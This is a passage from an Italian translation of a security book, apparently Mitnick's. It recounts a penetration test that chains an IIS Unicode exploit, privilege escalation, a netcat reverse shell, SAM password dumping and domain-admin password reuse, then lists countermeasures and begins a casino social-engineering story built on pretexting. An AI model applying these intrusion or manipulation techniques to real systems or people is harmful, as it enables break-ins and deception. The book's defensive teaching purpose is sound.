sì seppero che queste macchine si stavano, in effetti, collegando 
alla compagnia per fare delle richieste a un'applicazione server 
da cui ottenere le informazioni di cui gli autisti avevano bisogno 
sul campo. 


L'accesso al sistema della compagnia 


. “Sapevamo bene,” ricorda Louis, “che l'utente avrebbe potu- 

to riferire in quel momento di una qualche attività strana, così ci 
tirammo fuori. Perché se l'incidente fosse stato riferito, e il ser- 
vizio Vpn disattivato, allora le credenziali di login che avevamo 
non sarebbero valse a nulla.” 

Pochi secondi dopo, videro cadere la loro connessione Pc 
Anywhere. La guardia si era disconnessa. Louis e soci avevano 
estratto le informazioni dal file Pwl sul filo di lana. 

Louis e Brock avevano ora un numero di telefono che pensa- 
vano servisse a chiamare uno degli apparecchi di dial-up che 
avevano disegnato sul diagramma al pub la notte precedente. 
Usando un sistema operativo Windows dello stesso tipo di quel- 
lo della guardia, si collegarono alla rete della compagnia, inseri- 
rono il nome utente e la password e “scoprimmo che eravamo 
riusciti ad aprire una sessione Vpn”. 

Per il modo in cui la Vpn era configurata, gli fu assegnato un 
indirizzo Ip virtuale, all'interno della zona demilitarizzata (Dmz) 
della compagnia. Si trovavano quindi dietro al primo firewall, ma 
ancora al di qua del firewall che proteggeva la rete interna sco- 
perta in precedenza. 

L'indirizzo Ip assegnato dalla Vpn si trovava nello spazio del- 
la Dmz ed era probabilmente ritenuto fidato dalle macchine 
della rete interna. Louis si aspettava che, penetrando nella rete 
interna, sarebbe stato tutto molto più facile visto che ormai ave- 
vano superato il primo firewall. “A questo punto,” dice, “ci aspet- 
tavamo che sarebbe stato facile superare il firewall ed entrare nel- 
le reti interne.” Ma quando fece il primo tentativo sulla macchi- 
na che gestiva l'applicazione server, scoprì che non poteva en- 
trarvi direttamente: “C'era una porta Tcp molto strana che era 
abilitata attraverso il sistema di filtraggio, che immaginammo 
servisse all'applicazione che le guardie stavano usando. Ma non 
sapevamo come funzionava”. 

Louis voleva trovare un sistema sulla rete interna della com- 
pagnia cui potessero accedere dall'indirizzo Ip che gli era stato 
assegnato. Adottò le “solite regole dell’hacker” per cercare di tro- 
vare un sistema da attaccare. 

Speravano di trovare un sistema qualsiasi all’interno della re- 
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te che non fosse accessibile a distanza, ben sapendo che proba- 
bilmente non sarebbe stato protetto rispetto a certe vulnerabilità 
poiché “più probabilmente veniva trattato come un sistema a so- 
lo uso interno”. Usarono un port scanner per scansionare tutti i 
web server accessibili (sulla porta 80) su tutto lo spettro di indi- 
rizzi Ip della rete interna. Trovarono un server Windows con cui 
potevano comunicare su cui girava il noto software Internet Infor- 
mation Server (lis), ma in una vecchia versione, l'Iis4. Fu una 
grande notizia, poiché avevano diverse probabilità di trovare dei 
punti deboli non riparati o degli errori di configurazione che gli 
avrebbero consegnato le chiavi del regno. 

La prima cosa che fecero fu lanciare uno strumento per l’in- 
dividuazione delle vulnerabilità, Unicode, sul server Iis4 per ve- 
dere se fosse vulnerabile, e lo era. (Unicode è un repertorio di ca- 
ratteri a 16-bit per la codifica dei caratteri di molte lingue diver- 
se a partire da un unico repertorio.) “Così riuscimmo a usare l'ex- 
ploit dell’Unicode per eseguire dei comandi sul web server Iis,” 
attaccando i punti deboli della sicurezza su un sistema situato 
oltre il secondo firewall filtrante della rete interna, “sempre più 
a fondo in quello che era ritenuto un territorio fidato”, secondo 
le parole di Louis. In questo caso gli hacker elaborarono una ri- 
chiesta web (http) che faceva uso di questi caratteri codificati in 
modo speciale per superare i controlli di sicurezza del web ser- 
ver. Il che li mise in condizione di eseguire dei comandi arbitra- 
ri con gli stessi privilegi dell'account sotto cui stava girando il 
web server. 

Bloccati perché non avevano la possibilità di uploadare dei 
file, vedevano ora un'opportunità. Sfruttarono la vulnerabilità 
Unicode per eseguire il comando “echo” della shell e uploadare 
uno script Active Server Pages (Asp), un semplice strumento di 
caricamento dei file che rese più semplice trasferire altri stru- 
menti di hacking in una directory sotto la webroot autorizzata a 
gestire gli script dal lato server. (La webroot è la directory prin- 
cipale del web server, da distinguere dalla directory principale di 
un qualsiasi hard drive, come C\). Il comando echo scrive sem- 
plicemente qualsiasi argomento gli venga passato; il risultato può 
essere ridiretto in un file invece che sullo schermo dell'utente. Per 
esempio, digitando “echo owned > mitnick.txt”, il comando scri- 
verà la parola “owned” nel file mitnick.txt. Usarono una serie di 
comandi echo per scrivere il codice sorgente di uno script Asp in 
una directory eseguibile sul web server. 

Poi caricarono sul server altri strumenti di hacking, compre- 
so il noto software di lavoro netcat, un'applicazione molto utile 
per installare una shell a linee di comando con cui origliare su 
una porta in entrata. Uploadarono anche uno strumento di ex- 
ploit chiamato Hk, meno efficace per via di un buco della ver- 
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sione più vecchia di Windows Nt, per ottenere i privilegi da am- 
ministratore di sistema. 

Caricarono un altro script semplice per lanciare l'exploit Hk, 
e poi usarono netcat per aprirsi una connessione shell di ritorno. 
‘ Questa connessione gli permetteva di eseguire dei comandi sul- 
la macchina obiettivo, in modo simile ai vecchi prompt del Dos, 
ai tempi del sistema operativo Dos. “Cercammo di lanciare una 
connessione in uscita dal web server interno al nostro computer 
nella Dmz,” spiega Louis. “Ma non funzionò, così dovemmo usa- 
re una tecnica chiamata port barging.” Dopo aver eseguito il pro- 
gramma Hk per ottenere i privilegi, configurarono netcat per ori- 
gliare sulla porta 80, per “togliersi di mezzo” il server lis tempo- 
raneamente e guardare la prima connessione in entrata sulla por- 
ta 80. 

Louis spiega il termine “barging” dicendo: “Sostanzialmente 
ti togli di torno lIis temporaneamente, ti impossessi della shell e 
permetti all’lis di ritornare sulla porta nello stesso momento in 
cui mantieni l’accesso alla tua shell”. In ambiente Windows, a dif- 
ferenza dei sistemi operativi di tipo Unix, è permesso avere due 
programmi che usano la stessa porta simultaneamente. Chi at- 
tacca può sfruttare questa caratteristica trovando una porta che 
non è filtrata dal firewall per poi eseguire il port barging. 

Questo è quanto fecero Louis e Brock. L'accesso shell che ave- 
vano già sull’host Iis era limitato ai diritti concessi all’account 
sotto cui girava il web server. Così lanciarono Hk e netcat e riu- 
scirono a guadagnare dei privilegi pieni di sistema (system user), 
autenticandosi come utente di sistema, che è il privilegio più im- 
portante sul sistema operativo. Usando delle metodologie stan- 
dard, questo accesso gli avrebbe permesso di ottenere un con- 
trollo pieno sull'ambiente Windows. 

Sul server girava Windows Nt 4.0. I due intrusi volevano una 
copia del file del Security Accounts Manager (Sam), che conte- 
neva i dati sugli account degli utenti, dei gruppi, i regolamenti e 
i controlli d'accesso. Sotto a questa vecchia versione del sistema 
operativo, gestirono il comando “rdisk /s” per creare un disco d'e- 
mergenza di riparazione. Questo programma crea inizialmente 
diversi file in una directory chiamata “repair”. Tra i vari file c'e- 
ra una versione aggiornata del file Sam che conteneva gli hash 
delle password per tutti gli account sul server. Prima Louis e Brock 
avevano recuperato il file Pwl che conteneva le password sensi- 
bili dal computer portatile di una guardia; ora stavano estraen- 
do le password cifrate degli utenti su uno dei server della stessa 
compagnia. Copiarono semplicemente il file Sam nella webroot 
del web server: “Quindi, usando un browser, lo trasferimmo dal 
server alla macchina nel nostro ufficio”. 

Quando ebbero craccato le password del file Sam, notaro- 
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no che c'era un altro account da amministratore sulla macchi- 
na locale che era diveso dall’account vero e proprio dell’am- 
ministratore: 


Dopo circa un paio d’ore, riuscimmo a craccare la password di que- 
sto account e poi provammo ad autenticarla sul controller del do- 
minio primario. E scoprimmo che l'account locale che avevamo 
hackerato, che aveva i diritti da amministratore sul web server, ave- 
va anche la stessa password sul dominio! L'account aveva anche i 
diritti di amministrazione sul dominio. 

Così c'era un account locale dell’amministratore sul web server che 
aveva lo stesso nome dell’account dell’amministratore del dominio 
per l’intero dominio, e anche la password di entrambi era la stessa. 
Si trattava ovviamente di un amministratore pigro che aveva in- 
stallato sulla macchina locale un secondo account con lo stesso no- 
me dell'account di amministrazione e gli aveva assegnato la stessa 
password. 


Passo dopo passo, l'account locale era semplicemente un am- 
ministratore del web server e non aveva i privilegi per l’intero do- 
minio. Ma recuperando la password di quell’account locale per 
il web server, e grazie a un amministratore pigro e sbadato, ora 
potevano compromettere l'account di amministrazione del do- 
minio. La responsabilità di un amministratore di dominio è di 
amministrare o gestire un intero dominio distinguendolo da un 
account di amministrazione di un computer fisso locale o di un 
computer portatile (la singola macchina). Secondo Louis, questo 
amministratore non faceva eccezione: 


È una pratica comune che si verifica continuamente. Un ammini- 
stratore di dominio creerà degli account locali sulle macchine del- 
la rete, e userà la stessa password per questi account con i privilegi 
da amministratore di dominio. Il che significa che la sicurezza di 
ciascuna di queste macchine può essere usata per compromettere 
la sicurezza dell'intero dominio. f 


Obiettivo raggiunto 


Si stavano avvicinando all'obiettivo. Louis e Brock videro che 
adesso potevano assicurarsi un controllo pieno dell’applicazione 
dal lato server e dei dati contenuti in esso. Controllarono l’indi- 
rizzo Ip della macchina che avevano trovato sul portatile della 
guardia e l'applicazione server cui si era collegato. Da qui, rea- 
lizzarono che l'applicazione server ricadeva nello stesso dominio. 
Alla fine ottennero un controllo pieno su tutte le operazioni del- 
la compagnia: 
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Ora avevamo raggiunto il cuore del business. Potevamo cambiare 
gli ordini sull’application server, e potevamo far consegnare alle guar- 
die i soldi dove volevamo. In sostanza potevamo creare degli ordini 
per le guardie del tipo: “Prendi dei soldi da questa azienda e conse- 
gnali a questo indirizzo”, e tu sei lì che aspetti per prenderli quan- 
do arrivano. 


O anche: “Prendi il prigioniero A, portalo in questo posto, 
consegnalo in custodia a questa persona”, e hai fatto sì che il tuo 
migliore amico esca di prigione. 

O un terrorista. 

Avevano nelle loro mani uno strumento per diventare ricchi, 
o per scatenare il panico. “Fu piuttosto scioccante perché non 
avevano considerato la possibilità di quanto potesse succedere se 
non lo avessimo portato alla loro attenzione,” dice Louis. E con- 
vinto che ciò che quell’azienda considera sicuro “è in realtà una 
sicurezza ballerina”. 


Riflessioni 


Louis e Brock non si arricchirono con il potere che avevano 
in mano e non crearono alcun ordine per rilasciare o trasferire 
prigionieri. Al contrario, consegnarono all'impresa una relazio- 
ne completa su quanto avevano scoperto. 

Dal loro racconto, la compagnia era stata seriamente negli- 
gente. Non avevano fatto un'analisi dei rischi passo dopo passo: 
“Se la prima macchina viene compromessa, cosa potrebbe fare 
un hacker da questo punto in poi?” e via dicendo. Si sentirono al 
sicuro perché con pochi cambi di configurazione poterono chiu- 
dere la falla che Louis gli aveva segnalato. Il loro assunto era che 
non c'erano altri errori al di là di quello che Louis e Brock erano 
riusciti a trovare e sfruttare. 

Louis la considera un'arroganza diffusa in questo settore: un 
esterno non può presentarsi e predicare la sicurezza inun’azienda. 
Il personale aziendale dell’It non ha problemi se gli vengono det- 
te un po’ di cose che vanno messe a posto, ma non accetteranno 
mai che qualcuno gli dica quello che devono fare. Pensano di sa- 
perlo già. Quando avviene una violazione, pensano di aver fatto 
un errore solo in quell'occasione. 


Contromisure 


Come per molte altre storie trattate in questo libro gli autori 
dell'attacco non trovarono in questo caso molte falle nella sicu- 
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rezza nella compagnia prescelta, eppure le poche rintracciate fu- 
rono sufficienti a permettere loro di controllare l’intero dominio 
dei sistemi informatici della compagnia che erano essenziali per 
le operazioni di business. E bene dunque tenere a mente alcune 
lezioni. 


Soluzioni temporanee 


Abbiamo visto che a un certo punto l'apparecchio 3Com do- 
veva essere stato collegato direttamente alla porta seriale del rou- 
ter Cisco. 

Se l'urgenza di rispondere a bisogni immediati può giustifi- 
care delle scorciatoie tecnologiche temporanee, non esistono 
aziende che possono permettersi di trasformare il “temporaneo” 
in “eterno”. Bisognerebbe mettere a punto un calendario per con- 
trollare la configurazione degli apparecchi di entrata e di uscita 
tramite un'ispezione fisica e logica, oppure utilizzando uno stru- 
mento di sicurezza che monitori continuamente se una qualsia- 
si porta aperta esistente su un host o su un apparecchio sia com- 
patibile con il regolamento di sicurezza della compagnia. 


Usare le porte alte 


La compagnia che si occupava di sicurezza aveva configura- 
to un router della Cisco per consentire delle connessioni remote 
su una porta alta, presumibilmente nella convinzione che una 
porta alta fosse abbastanza oscura da non essere mai individua- 
ta da un attaccante, un’altra versione dell'approccio alla “sicu- 
rezza come vaghezza”. 

Abbiamo già trattato più di una volta in queste pagine le fol- 
lie implicite in una qualsiasi decisione a proposito di sicurezza 
basata su questo atteggiamento. Le storie raccolte in questo li- 
bro dimostrano ripetutamente che se lasci aperto un solo spira- 
glio, un intruso prima o poi lo troverà. La miglior prassi di sicu- 
rezza è assicurarsi che i punti di accesso di tutti i sistemi e di tut- 
ti i dispositivi, oscuri o meno che siano, vengano filtrati da qual- 
siasi rete non fidata. 


Le password 
Lo ripetiamo ancora una volta: tutte le password di default 


per qualsiasi strumento andrebbero cambiate prima che il siste- 
ma o l'apparecchio vengano messi in funzione. Persino i princi- 
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pianti conoscono questa svista e sanno come attaccarla. (Diver- 
si siti web, come http://www.phonoelit.de/dpl/dpl.html, fornisco- 
no una lista di nomi utenti e password di default.) 


Mettere in sicurezza i portatili del personale 


I sistemi usati dagli utenti della compagnia si collegavano al- 
la rete aziendale a distanza con poca o nessuna sicurezza, una si- 
tuazione sin troppo comune. Un client aveva persino Pc Anywhe- 
re configurato in modo da autorizzare delle connessioni remote 
in entrata senza neanche richiedere una password. Anche se il 
computer si collegava a Internet in dial-up, e solo per periodi di 
tempo molto limitati, ogni connessione apriva una finestra tem- 
porale di esposizione. Gli autori dell’attacco riuscirono a con- 
trollare a distanza la macchina collegandosi al portatile su cui gi- 
rava Pc Anywhere. E poiché era stato configurato senza richie- 
dere una password, gli hacker riuscirono a impossessarsi del de- 
sktop dell'utente conoscendone solo l'indirizzo Ip. 

Coloro che scrivono i regolamenti interni dell’It dovrebbero 
considerare l’ipotesi di un requisito che richieda ai sistemi client 
di rispettare un certo livello di sicurezza, prima di essere autoriz- 
zati a collegarsi alla rete aziendale. A riguardo sono disponibili 
prodotti che installano degli agenti sui sistemi client per garanti- 
re che i controlli di sicurezza siano commisurati con i regolamenti 
della compagnia. I malintenzionati analizzano i loro obiettivi pren- 
dendo in considerazione la situazione complessiva. Il che signifi- 
ca che cercano di identificare se vi sono degli utenti che si colle- 
gano a distanza, e, se è così, qual è l'origine di queste connessio- 
ni. Chi attacca sa se può compromettere un computer fidato che 
viene usato per i collegamenti alla rete aziendale, ed è altamente 
probabile che abusi di questo rapporto di fiducia per guadagnar- 
si l’accesso alle risorse informative aziendali. 

Anche quando la sicurezza viene gestita bene all’interno del- 
l'azienda, troppo spesso c'è la tendenza a non considerare i por- 
tatili e i computer domestici usati dai dipendenti per accedere al- 
la rete aziendale, lasciando un’apertura da cui gli intrusi posso- 
no trarre un vantaggio, proprio come è accaduto in questa vi- 
cenda. I portatili e i computer domestici che si collegano alla re- 
te interna devono essere sicuri; altrimenti il computer del dipen- 
dente può diventare l’anello debole. 


Autenticazione 


Gli hacker in questo caso riuscirono a estrarre i dati di au- 
tenticazione dal sistema del client senza essere individuati. Co- 
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me è stato ripetutamente sottolineato nei capitoli precedenti, una 
forma di autenticazione più seria fermerà la maggior parte degli 
attacchi. Le compagnie dovrebbero valutare l’uso di password di- 
namiche, smart cards, gettoni di autenticazione,’ o di certificati 
digitali come strumento di autenticazione per l’accesso remoto 
nelle Vpn o in altri sistemi sensibili. 


Filtrare i servizi non necessari 


Il personale addetto all’It dovrebbe considerare la creazione 
di un insieme di regole di filtraggio delle connessioni in entrata 
e in uscita su host e servizi specifici da reti non fidate come In- 
ternet, così come da reti semifidate (Dmz) all’interno della com- 
pagnia. i 


Hardening 


Questa storia ci ricorda anche che un addetto dell’It non si 
era preoccupato di rafforzare i sistemi collegati alla rete interna, 
o di aggiornarsi sulle patch di sicurezza, presumibilmente per- 
ché aveva la percezione che il rischio di essere compromessi fos- 
se basso. Questa pratica assai comune dà ai malintenzionati un 
vantaggio. Una volta che un intruso ha trovato il modo di entra- 
re in un sistema interno non sicuro ed è riuscito a compromet- 
terlo, la porta è aperta all'accesso illecito ad altri sistemi che so- 
no ritenuti fidati dal computer compromesso. Ancora una volta, 
affidarsi semplicemente al firewall perimetrale per tenere alla lar- 
ga gli hacker senza preoccuparsi di rafforzare i sistemi collegati 
alla rete aziendale è come raccogliere tutti i vostri averi in un cu- 
mulo di banconote da cento dollari sul tavolo della camera da 
pranzo e pensare di essere al sicuro perché tenete la porta di ca- 
sa chiusa a chiave. 


Conclusioni 


Poiché questo è l’ultimo capitolo dedicato ai casi di attacchi 
di tipo tecnico, sembra essere il punto giusto per fare una sinte- 
si e ricapitolare. 

Se vi fosse chiesto di elencare dei passi importanti per difen- 
dersi contro le vulnerabilità più comuni che permettono agli 


3 Tokens nell'originale. Nei sistemi di autenticazione il “token” può essere sia 
undispositivo fisico, come per esempio il token Usb certificato da VeriSign. [N.d.7.] 
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hacker di intrufolarsi, basandovi sui casi citati in questo libro, 
quali sarebbero le vostre risposte? 
Per favore valutatele bene; poi andate avanti. 


Quali che siano i punti che avete elencato tra le vulnerabilità 
più comuni descritte in questo libro, spero che abbiate ricorda- 
to di inserirne almeno qualcuna di queste: 


e Sviluppate un processo per la gestione delle patch per assi- 
curarvi che tutti gli aggiornamenti necessari vengano applicati 
in modo puntuale. 

e Per l’accesso remoto e per l’accesso alle informazioni sen- 
sibili o alle risorse di calcolo, usate metodi più forti di autenti- 
cazione di quelli forniti dalle password statiche. 

e Cambiate tutte le password preassegnate. 

e Usate un modello di difesa in profondità, in modo che il ce- 
dimento di un solo punto non metta a rischio la sicurezza e te- 
state questo modello regolarmente. 

e Stabilite un regolamento aziendale di sicurezza che riguar- 
di il filtraggio del traffico in entrata e in uscita. 

e Rafforzate tutti i sistemi dal lato client che accedono alle 
informazioni sensibili o alle risorse informatiche. Non dimenti- 
chiamo che l’intruso determinato prende di mira anche i client o 
per impadronirsi di una connessione legittima o per sfruttare un 
rapporto di fiducia tra il sistema del client e la rete aziendale. 

e Usate degli apparecchi per il rilevamento delle intrusioni 
con cui identificare il traffico sospetto o i tentativi di attaccare 
delle vulnerabilità conosciute. Questi sistemi potrebbero anche 
identificare un interno malintenzionato o un attaccante esterno 
che ha già compromesso il perimetro di sicurezza. 

o Attivate funzionalità di auditing del sistema operativo e del- 
le applicazioni più importanti. Inoltre, assicuratevi che i log sia- 
no conservati su un host sicuro che non abbia altri servizi e il mi- 
nor numero possibile di account. 
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10. 


Gli ingegneri sociali: come si comportano 
e come fermarli 


L'ingegnere sociale impiega le stesse tecniche di 
persuasione che tutti noi usiamo ogni giorno. 
Cerchiamo di costruirci una credibilità. Ci vin- 
coliamo con obblighi reciproci. Ma l'ingegnere 
sociale applica queste tecniche in modo mani- 
polatorio, ingannevole, altamente non etico, 
spesso con effetti devastanti. 


Dottor Brad Sagarin 


Questo capitolo è diverso dagli altri: esaminiamo il tipo di at- 
tacco più difficile da individuare e da cui difendersi. L'ingegnere 
sociale — o l'ingegnere esperto nell'usare l’arte dell'inganno come 
una delle armi del suo arsenale — sfrutta e preda le qualità mi- 
gliori dell'animo umano: la nostra tendenza naturale ad aiutare 
e sostenere gli altri, l'essere gentili, il lavorare in squadra e il no- 
stro desiderio di portare a termine il lavoro. 

Come per la maggior parte delle cose che ci minacciano nella 
vita, il primo passo per costruire una difesa concreta è la com- 
prensione delle metodologie usate dai cyber-avversari. Così, in que- 
sto capitolo offriamo una serie di considerazioni di ordine psico- 
logico che esplorano le basi del comportamento umano e che con- 
sentono all'ingegnere sociale di esercitare la sua influenza. 

Prima però, partiamo da una storia rivelatrice di un ingegnere 
sociale al lavoro. Quanto segue si basa su un racconto che ab- 
biamo ricevuto in forma scritta, che è sia divertente, sia un caso 
di ingegneria sociale da libro di testo. L'abbiamo ritenuta tal- 
mente interessante che abbiamo deciso di includerla nonostan- 
te alcune riserve; l’autore o ha omesso accidentalmente alcuni 
particolari perché era distratto da altri impegni lavorativi, oppu- 
re ha inventato alcune parti della storia. E tuttavia, anche in que- 
sta seconda ipotesi, esse rendono il caso molto convincente sul- 
la necessità di una protezione migliore contro gli attacchi di so- 
cial engineering. 

Come in altre parti del libro, alcuni particolari sono stati cam- 
biati per proteggere sia l'autore dell'attacco sia l'azienda che l'a- 
veva assoldato. 
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Un ingegnere sociale al lavoro 


Nell'estate del 2002, un consulente per la sicurezza il cui nick- 
name è “Whurley” fu assoldato da un gruppo di Las Vegas per 
eseguire una serie di security audit. In quel momento il gruppo 
stava rimodulando il suo approccio alla sicurezza e lo assunse 
per “cercare di aggirare ogni singola procedura” nel tentativo di 
aiutarli a costruire un’infrastruttura di sicurezza migliore. Luo- 
mo aveva una grande esperienza tecnica, ma poca esperienza di 
casinò. 

Dopo circa una settimana di ricerche approfondite sulla cul- 
tura della Strip, era arrivato il momento della vera Las Vegas. 
Per lui era una pratica consolidata cominciare il lavoro in anti- 
cipo e finirlo prima dell'inizio ufficiale programmato, perché ne- 
gli anni aveva scoperto che i dirigenti non informano i dipendenti 
di una verifica potenziale prima della settimana in cui credono 
che debba aver luogo. “Anche se in teoria non dovrebbero dare a 
nessuno un vantaggio, lo fanno.” Ma aggirò facilmente questo 
meccanismo effettuando l'audit due settimane prima della data 
programmata. 

Anche se erano le nove di sera quando arrivò e si sistemò nel- 
la sua camera d'albergo, Whurley andò immediatamente al pri- 
mo casinò nel suo elenco per iniziare la ricerca sul posto. Non 
conoscendo molto i casinò, l’esperienza gli offrì diverse sorpre- 
se. La prima cosa che notò era in palese contraddizione con quan- 
to visto sul canale via cavo “Travel”, dove ogni impiegato dei ca- 
sinò mostrato o intervistato sembrava appartenere a un élite di 
specialisti di sicurezza. La maggioranza dei dipendenti che si tro- 
vava di fronte sembrano invece “o dormire completamente in pie- 
di o del tutto disponibili nel loro lavoro”. Entrambe queste con- 
dizioni li rendevano dei facili obiettivi per tentare un approccio 
confidenziale, il che non era neanche lontanamente quanto ave- 
va progettato. 

Si avvicinò a un dipendente molto rilassato e scoprì che, an- 
che con domande vaghe, la persona era del tutto disponibile a di- 
scutere i particolari del suo lavoro. Ironicamente, l'uomo aveva 
lavorato in precedenza nel casinò del cliente di Whurley. “Lì im- 
magino che era molto meglio, no?” chiese Whurley. 

Il dipendente rispose: “Non proprio. Qui mi sottopongono a 
verifiche continue. Lì non si accorgevano neanche se rimanevo 
indietro, un po’ su tutto... orologi, tesserini, scadenze, qualsiasi 
cosa. La loro mano destra non sa quello che fa la sinistra”. 

L'uomo spiegò anche che perdeva spessissimo il suo tesseri- 
no da dipendente e che a volte se lo scambiava con un collega per 


! Il viale centrale di Las Vegas, dove sorgono tutti i casinò. [N.d.7.] 
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entrare alla mensa gratuita dei dipendenti nella zona dei bar del 
personale, situata nei recessi del casinò. 

La mattina seguente Whurley definì il suo obiettivo, che era 
molto diretto: sarebbe entrato in tutte le aree protette del casinò 
in cui poteva, avrebbe documentato la sua presenza e avrebbe 
cercato di superare il maggior numero possibile di sistemi di si- 
curezza. Inoltre, voleva scoprire se avrebbe potuto accedere a uno 
qualsiasi dei sistemi di gestione delle finanze e di archiviazione 
di altre informazioni sensibili, come quelle sui clienti. 

Quella notte, sulla via del ritorno al suo albergo dopo aver vi- 
sitato il suo casinò, sentì alla radio la pubblicità di un club di fit- 
ness che offriva degli sconti ai dipendenti dell’industria dei ser- 
vizi. Dormì e la mattina dopo si diresse al club di fitness. 

Lì incontrò una donna di nome Lenore. “In quindici minuti 
avevamo stabilito una ‘connessione spirituale’.” La quale si rivelò 
preziosa perché Lenore era una consulente finanziaria e lui vo- 
leva sapere qualsiasi cosa avesse a che fare con le parole “finan- 
za” e “consulenze” riguardo al suo casinò. Se fosse riuscito a pe- 
netrare i sistemi finanziari con il suo audit, era certo che il clien- 
te l'avrebbe considerata una grande falla nella sicurezza. 

Uno dei giochi favoriti di Whurley quando fa ingegneria so- 
ciale è l’arte della lettura a freddo. Mentre parlavano, osservava 
dei segnali non verbali che portavano la donna a dire: “Oh, no 
merda, anch'io”. Legarono e lui le chiese di andare a cena. 

Durante la cena, Whurley le disse che era appena arrivato a 
Las Vegas e di essere in cerca di un lavoro; che aveva fatto luni- 
versità, si era laureato in Economia e si era trasferito lì dopo aver 
lasciato la sua ragazza. Poi le confessò di essere un po’ intimidi- 
to dal cercare di ottenere un lavoro di consulenza a Las Vegas 
perché non voleva finire col “nuotare in mezzo agli squali”. Lei 
lo rassicurò per circa due ore che non gli sarebbe stato difficile 
ottenere un lavoro nel ramo finanziario. Per aiutarlo, Lenore gli 
rivelò più particolari sul suo lavoro e il suo padrone di tutti quel- 
li di cui poteva avere bisogno: “Lei era la cosa migliore capitata- 
mi in questa occasione e fui felice di offrirle la cena, che in ogni 
caso era spesata”. 

Ricordando quel momento, dice che a quel punto era sin trop- 
po fiducioso nelle sue possibilità, “cosa che avrei pagato più tar- 
di”. Era giunto il momento di passare all’azione. Aveva fatto una 
borsa con “un po’ di cosette, tra cui il mio portatile, un punto 
d'accesso wireless a banda larga Orinoco, un'antenna, e qualche 
altro accessorio”. L'obiettivo era semplice. Cercare di entrare nel- 
la zona uffici del casinò, scattare foto digitali di se stesso (con la 
data) in luoghi in cui in teoria non doveva entrare, e poi instal- 
lare un access point wireless sulla rete interna in modo da poter 
hackerare a distanza il sistema per raccogliere informazioni sen- 
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sibili. Per completare il lavoro, sarebbe rientrato il giorno dopo 
per recuperare l’access point. 

“Mi sentivo un po’ come James Bond.” Whurley arrivò al ca- 
sinò, fuori dall'ingresso dei dipendenti, proprio al momento del 
cambio turno e si posizionò per poter guardare l'entrata. Pensò 
che sarebbe rimasto lì per un po’ di tempo per osservare le cose 
per qualche minuto. Ma gran parte delle persone erano già en- 
trate e fu costretto a entrare da solo. 

Pochi minuti di attesa e l’entrata era libera... il che non era 
quello che voleva. In ogni caso, Whurley notò una guardia che 
sembrava sul punto di andarsene, ma che fu fermata da una se- 
conda guardia con cui uscì a fumare subito fuori dell'ingresso. 
Quando finirono le sigarette, si separarono e presero a cammi- 
nare in direzione opposta: 


Mi incamminai dall'altra parte della strada verso la guardia che sta- 
va lasciando l’edificio e mi preparai a usare la mia domanda prefe- 
rita per accattivarmelo. Quando mi venne incontro attraversando la 
strada, lasciai semplicemente che mi superasse. 

Quindi gli disse: “Mi scusi, mi scusi, sa l’ora?”. 

Era tutto pianificato. “Una cosa che ho notato è che se ti av- 
vicini a qualcuno da davanti, sta quasi sempre più sulla difensi- 
va di quando ti lasci superare leggermente prima di rivolgerti a 
lui.” Mentre la guardia gli diceva l’ora, Whurley lo guardò atten- 
tamente. Una targhetta con il nome lo identificava come Char- 
lie: “Mentre eravamo l’uno di fronte all’altro ebbi un colpo di for- 
tuna. Un altro dipendente uscì dall'edificio e chiamò Charlie con 
il suo nickname, Cheesy. Così chiesi a Charlie se gli capitava spes- 
so di essere chiamato in quel modo non proprio bello, e lui mi 
spiegò come gli avevano affibbiato il nickname”.? 

Whurley si diresse quindi, con un'andatura spedita, verso l’en- 
trata dei dipendenti. Si dice spesso che la miglior difesa sia un 
buon attacco e questo era proprio il suo piano. Non appena rag- 
giunse l’entrata, dove aveva notato in precedenza degli impiega- 
ti che mostravano i tesserini, si recò direttamente dalla guardia 
all'entrata e gli disse: “Ehi, per caso hai visto Cheesy? Mi deve 
venti dollari e ho bisogno di soldi quando vado in pausa”. 

Ricordando quel giorno dice: “Maledizione! Quello fu il mo- 
mento in cui fui interrogato la prima volta”. Aveva dimenticato che 
gli impiegati consumano i loro pasti gratuitamente. Ma non fu 
messo fuori causa dalla domanda; se altre persone affette dalla 
Sindrome da distrazione/iperattività (Attention Deficit/Hyperac- 


? Cheesy (che potrebbe essere tradotto come “formaggione”) denota qualco- 
sa di scarsa qualità, fatta di materiali scadenti. [N.4.7.] 
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tive Disorder, Adhd), possono considerarla un problema, Whur- 
ley si descrive come uno “molto Adhd”, e aggiunge che, a causa 
della sindrome, “posso pensare molto più rapidamente del 90 per- 
cento delle persone che incontro”. Una capacità che gli tornò uti- 
le in quel contesto: 


Così la guardia mi dice: “Per quale motivo ti compri il pranzo in ogni 
caso?” e sorrise ma iniziò a sembrare sospettoso. Ribattei rapida- 
mente: “Devo vedere uno zuccherino per pranzo. Sapessi quant'è 
bella”. (Questa tecnica distrae sempre le persone più anziane, quel- 
le fuori forma e i tipi-che-vivono-con-mamma.) “Come faccio ades- 
so?” 

La guardia mi fa: “Beh, sei fregato perché Cheesy non tornerà fino 
alla prossima settimana”. 

“Bastardo!”, dico io. 


La guardia poi divertì Whurley (un divertimento che non osò 
manifestare) chiedendogli inaspettatamente se era innamorato: 


Inizio quindi a giostrarmelo. Poi ho la sorpresa della mia vita. Non 
mi sono mai neanche avvicinato a qualcosa del genere. Può essere 
dovuto alla bravura, ma preferisco attribuirlo alla fortuna cieca: il 
tipo mi dà quaranta dollari! Mi dice che venti dollari non mi basta- 
no a pagare niente e che ovviamente sono io quello che deve paga- 
re. Poi mi dà cinque minuti di buoni consigli “paterni”, c su quanto 
gli sarebbe piaciuto sapere quando aveva i miei anni quello che sa- 
peva ora. 


Whurley era “terrorizzato” dal fatto che il tipo si fosse bevuto 
la truffa e stesse pagando per il suo appuntamento immaginario. 

Ma le cose non filarono esattamente in modo liscio, perché 
non appena Whurley fece per allontanarsi, la guardia realizzò 
che non gli aveva mostrato nessun documento d'identità, e glie- 
lo chiese: “Così risposi: ‘Ce l'ho nella borsa, mi dispiace’, e pre- 
si a rovistare tra le mie cose mentre mi allontanavo da lui. Era 
la mia ultima carta perché se avesse insistito per vedere il tes- 
serino, avrei potuto essere beccato”. 

Whurley aveva ora oltrepassato l'ingresso ma non aveva idea 
di dove andare. Non c'erano molte persone che poteva seguire, 
così si incamminò con passo sicuro e iniziò a prendere appunti 
mentali su quanto lo circondava. A questo punto non aveva mol- 
ta paura di essere fermato. “E divertente,” dice, “come la psico- 
logia dei colori possa tornare utile in certe circostanze. Indossa- 
vo il blu - il colore della verità — ed ero vestito come un giovane 
dirigente. La maggior parte delle persone che mi passavano at- 
